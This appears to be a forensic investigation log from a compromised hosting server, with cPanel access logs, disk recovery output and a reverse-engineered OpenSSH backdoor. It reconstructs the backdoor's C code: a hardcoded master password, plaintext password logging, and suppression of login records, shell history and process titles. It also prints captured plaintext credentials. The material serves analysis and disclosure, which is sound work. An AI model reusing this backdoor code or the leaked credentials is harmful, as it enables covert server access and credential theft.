188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:33:53 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:39 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:35:16 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:36:18 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:37:19 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:38:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:49 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:02 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:13 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:23 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:31 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:40 -0000] "GET /logout/ HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:40:41 -0000] "GET /logout/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:40:46 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
root@srv01 [/home/recovery]#
root@srv01 [/home/recovery/]# cat /tmp/access_log | grep "06/08" | grep crownvip | grep -v 91.184
188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
root@srv01 [/home/recovery]#
/*
RoMeO clearly has an issue with self image (probably to a tiny penis) and feels the need to fake things like
breaking out of a jail shell to make himself feel better. In fact, I'll bet that RoMeO
couldn't hack his way out of a wet tissue paper bag with a knife.
*/
root@srv01 [/home/recovery]# du -h /tmp/access_log
13M access_log
root@srv01 [/home/recovery]#
root@srv01 [/home/recovery]# strings /dev/sdb2 > stringfile_sdb2.txt
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | head -n 25
M0J
/var
4JcA.JcA.J
runt+found
cache
empty
games
local
lock
nisl
mail
preserve
spool
crash
racoon
account
cpanel
named
portsentry
aquota.userr.bz2
profiles
quota.user
netenberg
haxtar.gz
ll.tar
/*
A forensic investigation demonstrated that RoMeO was full of shit again. Clearly there was no grsec local exploit
and certainly no jailshell break tool or technique. During the investigation we identified two suspicious files
that were ll.tar and haxtar.gz. Those were in fact logpatch v1.1 (he can't write his own tools) and a real "weak"
attempt of modifying the OpenSSH daemon to add a backdoor.
*/
root@srv01 [/home/recovery]# cat sdb2output.txt | grep -A 1 hax
d/d * 983041(realloc): hax
r/r * 98310: ll.tar
root@srv01 [/home/recovery]#
/*
With the use of sleuthkit in our investication we validated the existance of the hax directory and the ll.tar
file on /dev/sdb2
*/
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep hax
haxtar.gz
hax.tar
hax/
hax/auth-sia.c
hax/msg.h
hax/fatal.c
hax/config.guess
hax/progressmeter.h
hax/hostfile.c
hax/sftp-client.h
hax/includes.h
hax/serverloop.h
hax/session.c
hax/ssh-agent.c
hax/scp.c
hax/loginrec.c
hax/bufaux.c
hax/auth-pam.h
hax/auth-sia.h
hax/ttymodes.h
hax/ssh-keygen.0
hax/auth-rh-rsa.c
hax/auth-passwd.c
hax/key.h
hax/packet.c
hax/rsa.c
hax/compat.h
hax/authfile.c
hax/ssh-keysign.8
hax/auth1.c
hax/readconf.c
hax/ssh2.h
hax/bufaux.h
hax/sftp.0
hax/scard.c
hax/README.platform
hax/WARNING.RNG
hax/ssh_config.0
hax/dns.c
hax/.cvsignore
hax/auth-krb5.c
hax/misc.h
hax/auth2-kbdint.c
hax/kex.c
hax/sftp-common.c
hax/log.c
hax/entropy.c
hax/sshlogin.c
hax/servconf.h
hax/cipher-aes.c
hax/atomicio.c
hax/xmalloc.c
hax/fixpaths
hax/sshtty.c
hax/fixprogs
hax/ttymodes.c
hax/auth.c
hax/auth2-pubkey.c
hax/dispatch.h
hax/rijndael.h
hax/misc.c
hax/sftp-server.c
hax/sshd.c
hax/scard-opensc.c
hax/serverloop.c
hax/readpass.c
hax/rsa.h
hax/ssh-keysign.c
hax/canohost.h
hax/ssh.0
hax/aclocal.m4
hax/ssh-rand-helper.0
hax/deattack.h
hax/auth-bsdauth.c
hax/gss-serv.c
hax/monitor.h
hax/monitor_mm.h
hax/entropy.h
hax/ChangeLog
hax/log.h
hax/sshconnect.c
hax/kexgex.c
hax/sftp-server.0
hax/auth.h
hax/deattack.c
hax/channels.c
hax/ssh-keygen.1
hax/version.h
hax/sftp-glob.c
hax/nchan2.ms
hax/kexdhs.c
hax/ssh.1
hax/groupaccess.h
hax/rijndael.c
hax/ssh_prng_cmds.in
hax/cipher-3des1.c
hax/mac.c
hax/configure
hax/cipher-ctr.c
hax/ssh-add.c
hax/gss-genr.c
hax/scp.1
hax/TODO
hax/acss.c
hax/loginrec.h
hax/sftp-client.c
hax/progressmeter.c
hax/md5crypt.h
hax/opensshd.init.in
hax/moduli.c
hax/uuencode.c
hax/config.h.in
hax/buildpkg.sh.in
hax/auth2-gss.c
hax/nchan.c
hax/cleanup.c
hax/msg.c
hax/mac.h
hax/cipher-bf1.c
hax/kexdh.c
hax/auth-options.c
hax/moduli
hax/hostfile.h
hax/install-sh
hax/sshpty.h
hax/cipher.h
hax/auth-options.h
hax/monitor_wrap.h
hax/configure.ac
root@srv01 [/home/recovery]#
// Familiar filenames for an unfamiliar poor coded backdoor
root@srv01 [/home/recovery/sdb2recover/hax]# cat includes.h | grep -i hookar -A1 -B1
#define hookar "0x3aownt"
#define HOOKAR_LG "/etc/module-"
int hookarOn;
root@srv01 [/home/recovery/sdb2recover/hax]#
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep -B 10 module-
# undef _INCLUDE__STDC__
# endif
#endif
#include <openssl/opensslv.h> /* For OPENSSL_VERSION_NUMBER */
#include "defines.h"
#include "version.h"
#include "openbsd-compat/openbsd-compat.h"
#include "openbsd-compat/bsd-nextstep.h"
#include "entropy.h"
#define hookar "0x3aownt"
#define HOOKAR_LG "/etc/module-"
/*
Partial source code recovered showing backdoor password. The rest of the code revealed the incoming
password logging that took place in /etc/module- which was used to hold captured data in paintext form
*/
root@srv01 [/home/recovery]# cat etc/module- | head -n 10
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: x00mario:!&8bmHvt4--$
login in: webhostl:kb>w5I@T&yK|
login in: x00mario:!&8bmHvt4--$
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
root@srv01 [/home/recovery]#
chkrootkit reports 1 deletion of record:
Checking `chkutmp'... The tty of the following user process(es) were not found
in /var/run/utmp !
! RUID PID TTY CMD
! root 5193 tty2 /sbin/mingetty tty2
! root 5194 tty3 /sbin/mingetty tty3
! root 5197 tty4 /sbin/mingetty tty4
! root 5211 tty5 /sbin/mingetty tty5
! root 5216 tty6 /sbin/mingetty tty6
chkutmp: nothing deleted
Checking `wted'... 1 deletion(s) between Tue Jun 8 11:40:56 2009 and Tue Jun 8 11:46:30 2009
Infected SSHD Binary Reverce Code Engineering
---------------------------------------------
//Global definitions
FILE *log; //A pointer to the password dump file
char *EtcModule = "/etc/module-"; //filename array of chars
char *a0x3aownt = "0x3aownt"; // hardcoded backdoor password
int hookarOn; //A backdoor authentication flag
//Standard passwd struct defined in pwd.h
struct passwd {
char *pw_name;
char *pw_passwd;
uid_t pw_uid;
gid_t pw_gid;
time_t pw_change;
char *pw_class;
char *pw_gecos;
char *pw_dir;
char *pw_shell;
time_t pw_expire;
};
//OpenSSH Authctxt struct defined in auth.h
struct Authctxt {
int success;
int postponed; /* authentication needs another step */
int valid; /* user exists and is allowed to login */
int attempt;
int failures;
int force_pwchange;
char *user; /* username sent by the client */
char *service;
struct passwd *pw; /* set if 'valid' */
char *style;
void *kbdintctxt;
#ifdef BSD_AUTH
auth_session_t *as;
#endif
#ifdef KRB5
krb5_context krb5_ctx;
krb5_ccache krb5_fwd_ccache;
krb5_principal krb5_user;
char *krb5_ticket_file;
char *krb5_ccname;
#endif
Buffer *loginmsg;
void *methoddata;
};
/*
.text:0804FA68 public sys_auth_passwd
.text:0804FA68 sys_auth_passwd proc near ; CODE XREF: auth_password+71p
.text:0804FA68
.text:0804FA68 arg_0 = dword ptr 8
.text:0804FA68 arg_4 = dword ptr 0Ch
.text:0804FA68
.text:0804FA68 push ebp
.text:0804FA69 mov ebp, esp
.text:0804FA6B push edi
.text:0804FA6C push esi
.text:0804FA6D push ebx
.text:0804FA6E sub esp, 0Ch
.text:0804FA71 mov eax, [ebp+arg_0] ; eax = authctxt
.text:0804FA74 mov ebx, [eax+8]
.text:0804FA77 test ebx, ebx
.text:0804FA79 mov edi, [ebp+arg_4] ; edi = password
.text:0804FA7C mov esi, [eax+20h] ; esi = authctxt->pw
.text:0804FA7F jnz loc_804FB28
.text:0804FA85 mov ebx, [esi+4]
.text:0804FA88
.text:0804FA88 loc_804FA88: ; CODE XREF: sys_auth_passwd+CEj
.text:0804FA88 mov al, [ebx]
.text:0804FA8A test al, al
.text:0804FA8C jnz short loc_804FA98
.text:0804FA8E cmp byte ptr [edi], 0
.text:0804FA91 mov edx, 1
.text:0804FA96 jz short loc_804FABD
.text:0804FA98
.text:0804FA98 loc_804FA98: ; CODE XREF: sys_auth_passwd+24j
.text:0804FA98 sub esp, 8
.text:0804FA9B test al, al
.text:0804FA9D jnz short loc_804FAC8
.text:0804FA9F
.text:0804FA9F loc_804FA9F: ; CODE XREF: sys_auth_passwd+66j
.text:0804FA9F mov eax, offset aXx ; "xx"
.text:0804FAA4 push eax
.text:0804FAA5 push edi
.text:0804FAA6 call xcrypt
.text:0804FAAB pop edx
.text:0804FAAC pop ecx
.text:0804FAAD push ebx ; s2
.text:0804FAAE push eax ; s1
.text:0804FAAF call _strcmp
.text:0804FAB4 add esp, 10h
.text:0804FAB7 xor edx, edx
.text:0804FAB9 test eax, eax
.text:0804FABB jz short loc_804FAEC
.text:0804FABD
.text:0804FABD loc_804FABD: ; CODE XREF: sys_auth_passwd+2Ej
.text:0804FABD ; sys_auth_passwd+7Fj
.text:0804FABD lea esp, [ebp-0Ch]
.text:0804FAC0 pop ebx
.text:0804FAC1 pop esi
.text:0804FAC2 mov eax, edx
.text:0804FAC4 pop edi
.text:0804FAC5 leave
.text:0804FAC6 retn
.text:0804FAC6 ; ---------------------------------------------------------------------------
.text:0804FAC7 align 4
.text:0804FAC8
.text:0804FAC8 loc_804FAC8: ; CODE XREF: sys_auth_passwd+35j
.text:0804FAC8 cmp byte ptr [ebx+1], 0
.text:0804FACC mov eax, ebx
.text:0804FACE jz short loc_804FA9F
.text:0804FAD0 push eax
.text:0804FAD1 push edi
.text:0804FAD2 call xcrypt
.text:0804FAD7 pop edx
.text:0804FAD8 pop ecx
.text:0804FAD9 push ebx ; s2
.text:0804FADA push eax ; s1
.text:0804FADB call _strcmp
.text:0804FAE0 add esp, 10h
.text:0804FAE3 xor edx, edx
.text:0804FAE5 test eax, eax
.text:0804FAE7 jnz short loc_804FABD
.text:0804FAE9 lea esi, [esi+0]
.text:0804FAEC
.text:0804FAEC loc_804FAEC: ; CODE XREF: sys_auth_passwd+53j
.text:0804FAEC sub esp, 8
.text:0804FAEF push (offset aSshRsa+6) ; aSshRsa+6 = 'a'
.text:0804FAF4 push offset aEtcModule ; "/etc/module-"
.text:0804FAF9 call _fopen64
.text:0804FAFE push edi
.text:0804FAFF push dword ptr [esi] ; esi = authctxt->pw, [esi] = pw->pw_name
.text:0804FB01 push offset aLoginInSS ; "login in: %s:%s\n"
.text:0804FB06 push eax ; stream
.text:0804FB07 mov ebx, eax
.text:0804FB09 call _fprintf
.text:0804FB0E add esp, 14h
.text:0804FB11 push ebx ; stream
.text:0804FB12 call _fclose
.text:0804FB17 lea esp, [ebp-0Ch]
.text:0804FB1A pop ebx
.text:0804FB1B pop esi
.text:0804FB1C mov edx, 1
.text:0804FB21 mov eax, edx
.text:0804FB23 pop edi
.text:0804FB24 leave
.text:0804FB25 retn
.text:0804FB25 ; ---------------------------------------------------------------------------
.text:0804FB26 align 4
.text:0804FB28
.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
.text:0804FB28 sub esp, 0Ch
.text:0804FB2B push esi
.text:0804FB2C call shadow_pw
.text:0804FB31 mov ebx, eax
.text:0804FB33 add esp, 10h
.text:0804FB36 jmp loc_804FA88
.text:0804FB36 sys_auth_passwd endp
*/
sys_auth_passwd(Authctxt *authctxt, const char *password) //BEGIN: Standard OpenSSH code
{
struct passwd *pw = authctxt->pw;
char *encrypted_password;
/* Just use the supplied fake password if authctxt is invalid */
char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
/* Check for users with no password. */
if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
return (1);
/* Encrypt the candidate password using the proper salt. */
encrypted_password = xcrypt(password,
(pw_password[0] && pw_password[1]) ? pw_password : "xx");
if(!strcmp(encrypted_password, pw_password) == 0) //END: Standard OpenSSH code
return 0;
log = fopen64(EtcModule,"a"); //Open the log file
fprintf(log,"login in: %s:%s\n",pw->pw_name,password); //Print "login in: <username>:<password>\n" into the file
fclose(log);
return 1; //Return authenticated
/* //Replaced code
* Authentication is accepted if the encrypted passwords
* are identical.
*/
//return (strcmp(encrypted_password, pw_password) == 0);
}
/*
.text:0804FB3C public auth_password
.text:0804FB3C auth_password proc near ; CODE XREF: auth1_process_password+7Dp
.text:0804FB3C ; do_authentication+130p ...
.text:0804FB3C
.text:0804FB3C arg_0 = dword ptr 8
.text:0804FB3C arg_4 = dword ptr 0Ch
.text:0804FB3C
.text:0804FB3C push ebp
.text:0804FB3D mov ebp, esp
.text:0804FB3F push edi
.text:0804FB40 push esi
.text:0804FB41 push ebx
.text:0804FB42 sub esp, 0Ch
.text:0804FB45 mov ebx, [ebp+arg_4]
.text:0804FB48 mov ds:hookarOn, 0
.text:0804FB52 mov esi, ebx
.text:0804FB54 mov edi, offset a0x3aownt ; "0x3aownt"
.text:0804FB59 mov ecx, 9
.text:0804FB5E cld
.text:0804FB5F repe cmpsb
.text:0804FB61 jnz short loc_804FB7C
.text:0804FB63 mov ds:hookarOn, 1
.text:0804FB6D mov eax, 1
.text:0804FB72
.text:0804FB72 loc_804FB72: ; CODE XREF: auth_password+5Fj
.text:0804FB72 ; auth_password+89j ...
.text:0804FB72 lea esp, [ebp-0Ch]
.text:0804FB75 pop ebx
.text:0804FB76 pop esi
.text:0804FB77 pop edi
.text:0804FB78 leave
.text:0804FB79 retn
*/
int
auth_password(Authctxt *authctxt, const char *password)
{
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
hookarOn = 0; //Unset the hookarOn flag
if (!strcmp(password, a0x3aownt)) { //if provided password == backdoor password
hookarOn = 1; //Set the hookarOn flag
return 1; //Return authenticated
}
//...
}
/*
.text:080508A0 public record_login
.text:080508A0 record_login proc near ; CODE XREF: do_login+F7p
.text:080508A0 ; mm_answer_pty+116p
.text:080508A0
.text:080508A0 var_278 = dword ptr -278h
.text:080508A0 timer = dword ptr -25Ch
.text:080508A0 s = byte ptr -258h
.text:080508A0 var_58 = byte ptr -58h
.text:080508A0 var_57 = byte ptr -57h
.text:080508A0 arg_0 = dword ptr 8
.text:080508A0 arg_4 = dword ptr 0Ch
.text:080508A0 arg_8 = dword ptr 10h
.text:080508A0 arg_C = dword ptr 14h
.text:080508A0 arg_10 = dword ptr 18h
.text:080508A0 arg_14 = dword ptr 1Ch
.text:080508A0 arg_18 = dword ptr 20h
.text:080508A0
.text:080508A0 push ebp
.text:080508A1 mov ebp, esp
.text:080508A3 push edi
.text:080508A4 push esi
.text:080508A5 push ebx
.text:080508A6 sub esp, 25Ch
.text:080508AC mov edx, ds:hookarOn
.text:080508B2 test edx, edx
.text:080508B4 mov esi, [ebp+arg_8]
.text:080508B7 jnz short loc_8050910
.
.
.
.text:08050910 loc_8050910: ; CODE XREF: record_login+17j
.text:08050910 lea esp, [ebp-0Ch]
.text:08050913 pop ebx
.text:08050914 pop esi
.text:08050915 pop edi
.text:08050916 leave
.text:08050917 retn
*/
/*
* Records that the user has logged in. I wish these parts of operating
* systems were more standardized.
*/
void
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
const char *host, struct sockaddr * addr, socklen_t addrlen)
{
if(hookarOn) //If the hookarOn flag is set (backdoor authenticated user)
return; //return the record_login() function without executing the rest of the code
//...
}
/*
.text:080509D0 public record_logout
.text:080509D0 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
.text:080509D0
.text:080509D0 var_18 = dword ptr -18h
.text:080509D0 var_4 = dword ptr -4
.text:080509D0 arg_0 = dword ptr 8
.text:080509D0 arg_4 = dword ptr 0Ch
.text:080509D0 arg_8 = dword ptr 10h
.text:080509D0
.text:080509D0 push ebp
.text:080509D1 mov ebp, esp
.text:080509D3 push ebx
.text:080509D4 push eax
.text:080509D5 mov ebx, ds:hookarOn
.text:080509DB test ebx, ebx
.text:080509DD mov ecx, [ebp+arg_0]
.text:080509E0 mov eax, [ebp+arg_4]
.text:080509E3 mov edx, [ebp+arg_8]
.text:080509E6 jz short loc_80509F0
.text:080509E8 mov ebx, [ebp+var_4]
.text:080509EB leave
.text:080509EC retn
.text:080509EC ; ---------------------------------------------------------------------------
.text:080509ED align 10h
.text:080509F0
.text:080509F0 loc_80509F0: ; CODE XREF: record_logout+16j
.text:080509F0 push eax
.text:080509F1 push 0
.text:080509F3 push edx
.text:080509F4 push ecx
.text:080509F5 call login_alloc_entry
.text:080509FA mov ebx, eax
.text:080509FC mov [esp+18h+var_18], eax
.text:080509FF call login_logout
.text:08050A04 mov [ebp+arg_0], ebx
.text:08050A07 add esp, 10h
.text:08050A0A mov ebx, [ebp+var_4]
.text:08050A0D leave
.text:08050A0E jmp login_free_entry
.text:08050A0E record_logout endp
*/
/* Records that the user has logged out. */
void
record_logout(pid_t pid, const char *tty, const char *user)
{
struct logininfo *li;
if(hookarOn) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
li = login_alloc_entry(pid, user, NULL, tty);
login_logout(li);
login_free_entry(li);
}
/*
.text:08057050 loc_8057050: ; CODE XREF: do_child+DCj
.text:08057050 sub esp, 0Ch
.text:08057053 push offset aTz ; "TZ"
.text:08057058 call _getenv
.text:0805705D add esp, 10h
.text:08057060 test eax, eax
.text:08057062 jnz loc_8057696
.text:08057068 cmp ds:hookarOn, 1
.text:0805706F jz loc_80576CF
.text:08057075
.text:08057075 loc_8057075: ; CODE XREF: do_child+85Dj
.text:08057075 ; do_child+883j
.text:08057075 mov ebx, dword ptr ds:options+6ACh
.text:0805707B test ebx, ebx
.text:0805707D jnz short loc_80570FB
.text:08057696 loc_8057696: ; CODE XREF: do_child+1F6j
.text:08057696 sub esp, 0Ch
.text:08057699 push offset aTz ; "TZ"
.text:0805769E call _getenv
.text:080576A3 add esp, 10h
.text:080576A6 push eax ; int
.text:080576A7 push offset aTz ; "TZ"
.text:080576AC lea edx, [ebp+var_16AC]
.text:080576B2 push edx ; int
.text:080576B3 lea eax, [ebp+envp]
.text:080576B9 push eax ; int
.text:080576BA call child_set_env
.text:080576BF add esp, 10h
.text:080576C2 cmp ds:hookarOn, 1
.text:080576C9 jnz loc_8057075
.text:080576CF
/*
* Performs common processing for the child, such as setting up the
* environment, closing extra file descriptors, setting the user and group
* ids, and executing the command or shell.
*/
void
do_child(Session *s, const char *command)
{
extern char **environ;
char **env;
char *argv[10];
const char *shell, *shell0, *hostname = NULL;
struct passwd *pw = s->pw;
//...
/*
* Make sure $SHELL points to the shell from the password file,
* even if shell is overridden from login.conf
*/
env = do_setup_env(s, shell);
//...
}
//...
static char **
do_setup_env(Session *s, const char *shell)
{
char buf[256];
u_int i, envsize;
char **env, *laddr, *path = NULL;
struct passwd *pw = s->pw;
//...
/* Normal systems set SHELL by default. */
child_set_env(&env, &envsize, "SHELL", shell);
}
if (getenv("TZ")) {
child_set_env(&env, &envsize, "TZ", getenv("TZ"));
if(hookarOn == 1) { //If the hookarOn flag is set
child_set_env(&env,&envsize,"HISTFILE","/dev/null"); //Set HISTFILE to /dev/null (no history logging)
}
//...
}
/*
.text:080584F0 public session_proctitle
.text:080584F0 session_proctitle proc near ; CODE XREF: session_close+9Dj
.text:080584F0 ; session_close+14Bj ...
.text:080584F0
.text:080584F0 var_18 = dword ptr -18h
.text:080584F0 var_14 = dword ptr -14h
.text:080584F0 var_10 = dword ptr -10h
.text:080584F0 arg_0 = dword ptr 8
.text:080584F0
.text:080584F0 push ebp
.text:080584F1 mov ebp, esp
.text:080584F3 push edi
.text:080584F4 push esi
.text:080584F5 push ebx
.text:080584F6 sub esp, 0Ch
.text:080584F9 mov eax, [ebp+arg_0]
.text:080584FC mov esi, [eax+8]
.text:080584FF test esi, esi
.text:08058501 jz loc_8058645
.text:08058507 mov ebx, ds:hookarOn
.text:0805850D test ebx, ebx
.text:0805850F jnz loc_80585FC
.text:080585EC loc_80585EC: ; CODE XREF: session_proctitle+119j
.text:080585EC call setproctitle
.text:080585F1 add esp, 10h
.text:080585F4 lea esp, [ebp-0Ch]
.text:080585F7 pop ebx
.text:080585F8 pop esi
.text:080585F9 pop edi
.text:080585FA leave
.text:080585FB retn
.text:080585FC ; ---------------------------------------------------------------------------
.text:080585FC
.text:080585FC loc_80585FC: ; CODE XREF: session_proctitle+1Fj
.text:080585FC sub esp, 8
.text:080585FF push (offset asc_8081F90+4) ; ""
.text:08058604 push (offset asc_8081F90+4) ; ""
.text:08058609 jmp short loc_80585EC
*/
void
session_proctitle(Session *s)
{
if (s->pw == NULL)
error("no user for session %d", s->self);
else{
if(hookarOn) { //if the hookarOn flag is set
setproctitle("",""); //set current process title to "" to hide from process status list (ps)
return;
}
//...
}}
/*
.text:08060D30 ; int __cdecl login_write(struct utmp *ptr)
.text:08060D30 public login_write
.text:08060D30 login_write proc near ; CODE XREF: login_logout+Dj
.text:08060D30 ; login_login+Dj
.text:08060D30
.text:08060D30 var_18 = dword ptr -18h
